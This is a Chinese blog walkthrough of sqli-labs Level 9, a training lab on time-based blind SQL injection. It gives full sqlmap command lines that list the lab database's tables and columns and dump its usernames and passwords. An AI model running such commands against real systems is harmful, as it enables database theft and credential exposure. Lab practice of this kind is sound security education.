web——sqliabs靶场——第九关——时间盲注

什么是时间盲注

时间盲注是指基于时间的盲注,也叫延时注入,根据页面的响应时间来判断是否存在注入。

使用sqlmap不同的技术

sqlmap --technique 参数用来设置具体SQL注入技术

B: Boolean-based blind 基于布尔的忙逐步

E:Error-based 报错注入

U:Union query-based Union查询注入

S:Stacked queries 堆叠注入

T:Time-based blind 基于时间的盲注

Q:lnline queries 内联查询注入

例如:

sqlmap -u "存在注入点的URL" --technique B --current-db #利用基于布尔的盲注对注入点进行SQL注入探测。

原文链接:https://blog.csdn.net/qq_49091880/article/details/122301562

使用时间盲注的脚本

1.爆数据库

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T --current-db --batch

batch是强制执行所有选择Y

2.爆破表名

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security --tables --batch

3.爆破列名

时间太慢了,sqlmap可以调整回显时间,

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users --columns --time-sec=1 --batch

--time-sec=1:回显时间为1

4. 爆破列里的数据

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C password --dump --time-sec=1 --batch

sqlmap -u "http://657b6c58-8aff-4835-a748-0dca79329577.node5.buuoj.cn/Less-9/?id=1" --technique=T -D security -T users -C username --dump --time-sec=1 --batch

时间盲注缺点:用时比较长。

相关推荐
老坛0018 分钟前
2025决策延迟的椭圆算子分析:锐减协同工具的谱间隙优化
前端
老坛0019 分钟前
从记录到预测:2025新一代预算工具如何通过AI实现前瞻性资金管理
前端
今禾11 分钟前
" 当Base64遇上Blob,图像转换不再神秘,让你的网页瞬间变身魔法画布! "
前端·数据可视化
华科云商xiao徐16 分钟前
高性能小型爬虫语言与代码示例
前端·爬虫
十盒半价17 分钟前
深入理解 React useEffect:从基础到实战的全攻略
前端·react.js·trae
攀登的牵牛花17 分钟前
Electron+Vue+Python全栈项目打包实战指南
前端·electron·全栈
iccb101318 分钟前
我是如何实现在线客服系统的极致稳定性与安全性的
前端·javascript·后端
一大树19 分钟前
Vue3祖孙组件通信方法总结
前端·vue.js
不要进入那温驯的良夜20 分钟前
跨平台UI自动化-Appium
前端
海底火旺20 分钟前
以一个简单的React应用理解数据绑定的重要性
前端·css·react.js